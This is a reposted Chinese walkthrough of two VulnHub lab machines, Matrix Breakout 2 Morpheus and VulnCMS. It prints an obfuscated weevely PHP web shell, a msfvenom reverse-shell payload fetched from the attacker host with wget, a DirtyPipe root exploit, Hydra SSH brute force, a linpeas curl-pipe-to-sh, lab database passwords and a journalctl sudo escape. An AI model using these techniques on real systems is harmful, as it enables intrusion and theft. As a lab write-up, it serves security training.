Vulnhub之Matrix Breakout 2 Morpheus靶机详细测试过程

Posted Jason_huawen

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Vulnhub之Matrix Breakout 2 Morpheus靶机详细测试过程相关的知识,希望对你有一定的参考价值。

Matrix Breakout:2 Morpheus

靶机信息

名称:Matrix-Breakout: 2 Morpheus

地址:

https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/

虽然作者提示该靶机最好是在VirtualBox部署,但是经过测试,本靶机在VirtualBox无法启动,更适合导入到Vmware中。

识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                              
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.1.1.1        00:50:56:c0:00:01      1      60  VMware, Inc.                                                                                             
 10.1.1.154      00:0c:29:e3:18:3e      1      60  VMware, Inc.                                                                                             
 10.1.1.254      00:50:56:e9:4a:e8      1      60  VMware, Inc.      


利用Kali Linux的netdiscover工具识别目标主机的IP地址为10.1.1.254

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.154 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 06:11 EDT
Nmap scan report for bogon (10.1.1.154)
Host is up (0.00088s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|_  256 aa83c351786170e5b7469f07c4ba31e4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.51 ((Debian))
|_http-title: Morpheus:1
|_http-server-header: Apache/2.4.51 (Debian)
81/tcp open  http    nginx 1.18.0
|_http-title: 401 Authorization Required
| http-auth: 
| HTTP/1.1 401 Unauthorized\\x0D
|_  Basic realm=Meeting Place
|_http-server-header: nginx/1.18.0
MAC Address: 00:0C:29:E3:18:3E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.13 seconds

NMAP扫描结果表明目标足迹有3个开放端口:22(ssh)、80(http)、81(http)

获得Shell

首先利用浏览器访问80端口,将图片下载到本地:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ ls      
nmap_full_scan  trinity.jpeg
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ steghide extract -sf trinity.jpeg 
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ stegseek trinity.jpeg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.67% (133.0 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ exiftool trinity.jpeg                                                                                                         
ExifTool Version Number         : 12.49
File Name                       : trinity.jpeg
Directory                       : .
File Size                       : 44 kB
File Modification Date/Time     : 2023:04:09 06:14:06-04:00
File Access Date/Time           : 2023:04:09 06:15:07-04:00
File Inode Change Date/Time     : 2023:04:09 06:14:06-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Profile CMM Type                : Linotronic
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : Hewlett-Packard
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Hewlett-Packard
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Image Width                     : 709
Image Height                    : 399
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 709x399
Megapixels                      : 0.283
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ binwalk -e trinity.jpeg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
382           0x17E           Copyright string: "Copyright (c) 1998 Hewlett-Packard Company"

从图片本身没有得到更多的信息。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ curl http://10.1.1.154/robots.txt                                                     
There\'s no white rabbit here.  Keep searching!
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ nikto -h http://10.1.1.154       
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.154
+ Target Hostname:    10.1.1.154
+ Target Port:        80
+ Start Time:         2023-04-09 06:14:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.51 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use \'-C all\' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 15c, size: 5cf63c252ab85, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ 7889 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2023-04-09 06:15:41 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server\'s headers (Apache/2.4.51) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ gobuster dir -u http://10.1.1.154 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.154
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,js,sh,txt
[+] Timeout:                 10s
===============================================================
2023/04/09 06:17:21 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 348]
/javascript           (Status: 301) [Size: 313] [--> http://10.1.1.154/javascript/]
/robots.txt           (Status: 200) [Size: 47]
/graffiti.txt         (Status: 200) [Size: 139]
/graffiti.php         (Status: 200) [Size: 451]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 1318968 / 1323366 (99.67%)
===============================================================
2023/04/09 06:19:32 Finished
===============================================================

利用Gobuster工具识别出两个文件:graffiti.txt,graffiti.php,访问这两个文件:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ curl http://10.1.1.154/graffiti.txt                                              
Mouse here - welcome to the Nebby!

Make sure not to tell Morpheus about this graffiti wall.
It\'s just here to let us blow off some steam.
                                               
http://10.1.1.154/graffiti.php

访问该URL,可以发送message,经过简单测试,Message字段存在XSS跨站脚本攻击漏洞,但是不好利用这个漏洞,继续分析。

利用Burpsuite拦截请求,发现在利用post提交message的时候,有参数file

因此可能存在本地文件包含漏洞。

修改为:

message=bob&file=../../../../../etc/passwd

但是返回:"Cannot open file: ../../../../../etc/passwd",可以用php filter绕过过滤:

message=bob&file=php://filter/convert.base64-encode/resource=graffiti.php

得到返回:

PGgxPgo8Y2VudGVyPgpOZWJ1Y2hhZG5lenphciBHcmFmZml0aSBXYWxsCgo8L2NlbnRlcj4KPC9oMT4KPHA+Cjw/cGhwCgokZmlsZT0iZ3JhZmZpdGkudHh0IjsKaWYoJF9TRVJWRVJbJ1JFUVVFU1RfTUVUSE9EJ10gPT0gJ1BPU1QnKSB7CiAgICBpZiAoaXNzZXQoJF9QT1NUWydmaWxlJ10pKSB7CiAgICAgICAkZmlsZT0kX1BPU1RbJ2ZpbGUnXTsKICAgIH0KICAgIGlmIChpc3NldCgkX1BPU1RbJ21lc3NhZ2UnXSkpIHsKICAgICAgICAkaGFuZGxlID0gZm9wZW4oJGZpbGUsICdhKycpIG9yIGRpZSgnQ2Fubm90IG9wZW4gZmlsZTogJyAuICRmaWxlKTsKICAgICAgICBmd3JpdGUoJGhhbmRsZSwgJF9QT1NUWydtZXNzYWdlJ10pOwoJZndyaXRlKCRoYW5kbGUsICJcbiIpOwogICAgICAgIGZjbG9zZSgkZmlsZSk7IAogICAgfQp9CgovLyBEaXNwbGF5IGZpbGUKJGhhbmRsZSA9IGZvcGVuKCRmaWxlLCJyIik7CndoaWxlICghZmVvZigkaGFuZGxlKSkgewogIGVjaG8gZmdldHMoJGhhbmRsZSk7CiAgZWNobyAiPGJyPlxuIjsKfQpmY2xvc2UoJGhhbmRsZSk7Cj8+CjxwPgpFbnRlciBtZXNzYWdlOiAKPHA+Cjxmb3JtIG1ldGhvZD0icG9zdCI+CjxsYWJlbD5NZXNzYWdlPC9sYWJlbD48ZGl2PjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJtZXNzYWdlIj48L2Rpdj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZmlsZSIgdmFsdWU9ImdyYWZmaXRpLnR4dCI+CjxkaXY+PGJ1dHRvbiB0eXBlPSJzdWJtaXQiPlBvc3Q8L2J1dHRvbj48L2Rpdj4KPC9mb3JtPgpZbTlpQ2c9PQ==
─(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ echo \'PGgxPgo8Y2VudGVyPgpOZWJ1Y2hhZG5lenphciBHcmFmZml0aSBXYWxsCgo8L2NlbnRlcj4KPC9oMT4KPHA+Cjw/cGhwCgokZmlsZT0iZ3JhZmZpdGkudHh0IjsKaWYoJF9TRVJWRVJbJ1JFUVVFU1RfTUVUSE9EJ10gPT0gJ1BPU1QnKSB7CiAgICBpZiAoaXNzZXQoJF9QT1NUWydmaWxlJ10pKSB7CiAgICAgICAkZmlsZT0kX1BPU1RbJ2ZpbGUnXTsKICAgIH0KICAgIGlmIChpc3NldCgkX1BPU1RbJ21lc3NhZ2UnXSkpIHsKICAgICAgICAkaGFuZGxlID0gZm9wZW4oJGZpbGUsICdhKycpIG9yIGRpZSgnQ2Fubm90IG9wZW4gZmlsZTogJyAuICRmaWxlKTsKICAgICAgICBmd3JpdGUoJGhhbmRsZSwgJF9QT1NUWydtZXNzYWdlJ10pOwoJZndyaXRlKCRoYW5kbGUsICJcbiIpOwogICAgICAgIGZjbG9zZSgkZmlsZSk7IAogICAgfQp9CgovLyBEaXNwbGF5IGZpbGUKJGhhbmRsZSA9IGZvcGVuKCRmaWxlLCJyIik7CndoaWxlICghZmVvZigkaGFuZGxlKSkgewogIGVjaG8gZmdldHMoJGhhbmRsZSk7CiAgZWNobyAiPGJyPlxuIjsKfQpmY2xvc2UoJGhhbmRsZSk7Cj8+CjxwPgpFbnRlciBtZXNzYWdlOiAKPHA+Cjxmb3JtIG1ldGhvZD0icG9zdCI+CjxsYWJlbD5NZXNzYWdlPC9sYWJlbD48ZGl2PjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJtZXNzYWdlIj48L2Rpdj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZmlsZSIgdmFsdWU9ImdyYWZmaXRpLnR4dCI+CjxkaXY+PGJ1dHRvbiB0eXBlPSJzdWJtaXQiPlBvc3Q8L2J1dHRvbj48L2Rpdj4KPC9mb3JtPgpZbTlpQ2c9PQ==\' | base64 -d
<h1>
<center>
Nebuchadnezzar Graffiti Wall

</center>
</h1>
<p>
<?php

$file="graffiti.txt";
if($_SERVER[\'REQUEST_METHOD\'] == \'POST\') 
    if (isset($_POST[\'file\'])) 
       $file=$_POST[\'file\'];
    
    if (isset($_POST[\'message\'])) 
        $handle = fopen($file, \'a+\') or die(\'Cannot open file: \' . $file);
        fwrite($handle, $_POST[\'message\']);
        fwrite($handle, "\\n");
        fclose($file); 
    


// Display file
$handle = fopen($file,"r");
while (!feof($handle)) 
  echo fgets($handle);
  echo "<br>\\n";

fclose($handle);
?>
<p>
Enter message: 
<p>
<form method="post">
<label>Message</label><div><input type="text" name="message"></div>
<input type="hidden" name="file" value="graffiti.txt">
<div><button type="submit">Post</button></div>
</form>
Ym9iCg==             

从代码可知:

$handle = fopen($file, \'a+\') or die(\'Cannot open file: \' . $file);

在Message部分协议php reverse shell代码,然后File字段比如叫做jason_shell.php

这样就会将message的内容写入jason_shell.php文件中。

上传php reverse代码出错,看来不能上传长度过长的代码,改用weevely产生backdoor.php

──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ weevely generate jason backdoor.php
Generated \'backdoor.php\' with password \'jason\' of 764 byte size.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ ls -alh 
total 64K
drwxr-xr-x  2 kali kali 4.0K Apr  9 06:46 .
drwxr-xr-x 19 kali kali 4.0K Apr  9 06:08 ..
-rw-r--r--  1 kali kali  764 Apr  9 06:46 backdoor.php
-rwx------  1 kali kali 2.3K Apr  9 06:40 jason_shell.php
-rw-r--r--  1 root root  966 Apr  9 06:11 nmap_full_scan
-rw-r--r--  1 kali kali  44K Apr  9 06:14 trinity.jpeg
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ cat backdoor.php   
<?php
$K=\'(:T);$r=@ba:T:Tse64_encode:T(@x(@gzcom:Tpr:Tess($:To),$k):T);print("$p:T$:Tkh$r$kf");\';
$l=\'Xr2nmj:TeG01":T;function x:T($t,$:Tk):T$c:T:T=:Tstrlen($k);$l=strlen($t);$:To="";fo:Tr\';
$M=\'$k=:T"2b87:T7b4b";$kh="8:T25b4:T8a9a095":T;:T$kf=:T"0dd5b:Td1f264d";$p:T:T=":TZsMvPw\';
$U=\':T;r:Teturn:T $o;if (:T@preg:T_ma:Ttc:Th("/$k:Th:T(.+):T$kf/":T,@file_ge:Tt_cont\';
$N=\'ents("php://:Tinput"):T,$m:T)==1) :T@o:Tb:T_start();@e:Tval(@gzu:Tncom:Tpress(@:Tx(@\';
$L=str_replace(\'p\',\'\',\'cppreate_ppfuncpption\');
$H=\':T($i=:T0;$i<$l;):T:T:Tfor(:T$j=0;($j<:T$c&&:T$i:T<$l);$j++,$i++)$o.=$t$i:T^$k$j\';
$z=\'bas:Te64_d:Tecode($:Tm[1]:T),$k)));$:To=:T@ob_g:Tet_contents():T;@o:Tb_end_:Tclean\';
$F=str_replace(\':T\',\'\',$M.$l.$H.$U.$N.$z.$K);
$W=$L(\'\',$F);$W();
?>

访问:http://10.1.1.154/graffiti.php,在message框中填入backdoor.php代码,然后用burpsuite拦截请求,将file=giraffiti.txt改为file=backdoor.php

上传成功,然后在Kali Linux上利用weevely 连接目标主机得到shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ weevely http://10.1.1.154/backdoor.php jason 

[+] weevely 4.0.1

[+] Target:     10.1.1.154
[+] Session:    /home/kali/.weevely/sessions/10.1.1.154/backdoor_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@morpheus:/var/www/html $ 

提权

下一步的目标是提权,可以先通过现有的shell产生meterpreter会话

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Matrix_breakout]
└─$ msfvenom -p  linux/x86/meterpreter/reverse_tcp LHOST=10.1.1.143 LPORT=6666 -f elf -o escalate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: escalate.elf

将所创建的escalate.elf文件上传到目标主机的tmp目录,并赋予可执行权限

www-data@morpheus:/var/www/html $ cd /tmp
www-data@morpheus:/tmp $ which wget
/usr/bin/wget
www-data@morpheus:/tmp $ wget http://10.1.1.143:8000/escalate.elf
--2023-04-09 18:55:17--  http://10.1.1.143:8000/escalate.elf
Connecting to 10.1.1.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: \'escalate.elf\'

     0K                                                       100% 58.5M=0s

2023-04-09 18:55:17 (58.5 MB/s) - \'escalate.elf\' saved [207/207]

www-data@morpheus:/tmp $ chmod +x escalate.elf

在Kali Linux测启动msfconsole ,并使用exploit/multi/handler启动侦听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 10.1.1.143
LHOST => 10.1.1.143
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.1.1.143:6666 
[*] Sending stage (1017704 bytes) to 10.1.1.154
[*] Meterpreter session 1 opened (10.1.1.143:6666 -> 10.1.1.154:53696) at 2023-04-09 06:57:57 -0400

这样Kali Linxu与目标主机之间建立了meterpreter会话

msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
msf6 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits


View the full module info with the info, or info -d command.

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.1.1.154 - Collecting local exploits for x86/linux...
[*] 10.1.1.154 - 174 exploit checks are being tried...
[+] 10.1.1.154 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.10.0
[+] 10.1.1.154 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 10.1.1.154 - exploit/linux/local/ubuntu_enlightenment_mount_priv_esc: The target appears to be vulnerable.
[*] Running check method for exploit 52 / 52
[*] 10.1.1.154 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2022_0847_dirtypipe                        Yes                      The target appears to be vulnerable. Linux kernel version found: 5.10.0                                                                                                                                                  
 2   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.
 3   exploit/linux/local/ubuntu_enlightenment_mount_priv_esc            Yes                      The target appears to be vulnerable.

选择第一个漏洞利用模块:

msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2022_0847_dirtypipe
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > show options 

Module options (exploit/linux/local/cve_2022_0847_dirtypipe):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   COMPILE           Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                            yes       The session to run this module on
   SUID_BINARY_PATH  /bin/passwd      no        The path to a suid binary
   WRITABLE_DIR      /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set LHOST 10.1.1.143
LHOST => 10.1.1.143
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

[*] Started reverse TCP handler on 10.1.1.143:8888 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.10.0
[*] Executing exploit \'/tmp/.xbscjxphxw /bin/passwd\'
[*] Sending stage (3045348 bytes) to 10.1.1.154
[+] Deleted /tmp/.xbscjxphxw
[*] Meterpreter session 2 opened (10.1.1.143:8888 -> 10.1.1.154:52560) at 2023-04-09 07:50:39 -0400


meterpreter > sessions 2
[*] Session 2 is already interactive.
meterpreter > shell
Process 2466 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 48K
drwx------  4 root root 4.0K Nov 29  2021 .
drwxr-xr-x 19 root root 4.0K Oct 28  2021 ..
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
-rw-------  1 root root   79 Oct 28  2021 .lesshst
drwxr-xr-x  3 root root 4.0K Oct 28  2021 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r--r--  1 root root   66 Oct 28  2021 .selected_editor
drwxr-xr-x  2 root root 4.0K Oct 28  2021 .vim
-rw-------  1 root root  11K Oct 28  2021 .viminfo
-rw-------  1 root root   54 Oct 28  2021 FLAG.txt
cat FLAG.txt
You\'ve won!

Let\'s hope Matrix: Resurrections rocks!

至此得到root shell和root flag

经验教训

  1. 对于Web应用尤其是涉及POST请求方法的靶机不能偷懒,最好使用Burpsuite工具对请求进行分析

  2. php filter使用时,首先看下这个Php文件本身,是否有返回,有些时候需要加上.php扩展名,有些时候不需要,如果这个Php文件本身返回,然后看是否可以去读取其他文件,比如/etc/passwd,/var/log/access.log文件

vulnhub之 VulnCMS: 1

                                                      VulnCMS: 1

信息搜集

首先进行ip扫描

看看开启了哪些端口

对端口进行扫描

 nmap -sC -sV -p 22,5000,80,8081,9001 192.168.181.146 --min-rate=2000

获取shell

在端口协议上进行扫描发现三个 WordPress 5.7.2 Joomla drupal,于是在msf上进行查看

我尝试了第八个,可是不行

 

于是我来测试最后一个

 search drupal

好像可以

输入shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

首先查看所有的wordpress

find / -type d -name  "wordpress" 2>/dev/null

于是在/html/wordpress/public_html 发现了wordpress数据库的用户名密码

find / -type d -name  "joomla" 2>/dev/null

于是找到了joomla数据库的用户名密码

我在查看INSTALL.sqlite.txt他告诉我了 drupal的用户名密码所在位置

于是我在/VAR/WWW//html/drupal/sites/default发现了用户名

 这是所有数据库的用户名和密码

                         user

                           passwd

drupal_admin

p@$$_C!rUP@!_cM5

joomla_admin

j00m1_@_dBpA$$

wp_admin

UUs3R_C!B@p@55

于是进入到数据库

对其进行解密,无效

在查看joomla数据库中的email特别像密码

在home目录下有三个用户

于是进行暴力破解 (用户名放在user.txt 密码放在passwd.txt)

hydra -L user.txt  -P passwd.txt   ssh://192.168.181.146

于是获得了用户名密码,进行ssh登录

登录成功

于是获得第一个flag

由于我无法查看其他目录,要重新定位

python3 -c 'import os; os.system("/bin/bash");'

提权

发现elliot用户无法提权

于是对tyrell进行密码破解,首先运行/linpeas.sh 输出为1.txt

curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh > 1.txt(要开加速器)

获得了用户名密码,进行ssh登录

sudo -l 提示/bin/journalctl进行提权

sudo journalctl

!/bin/sh

获得最终flag

 

以上是关于Vulnhub之Matrix Breakout 2 Morpheus靶机详细测试过程的主要内容,如果未能解决你的问题,请参考以下文章

Vulnhub_Breakout

Vulnhub_Breakout

VulnHub靶场——EMPIRE: BREAKOUT

VulnHub_Jangow: 1.0.1

VulnHub_Jangow: 1.0.1

VulnHub_Jangow: 1.0.1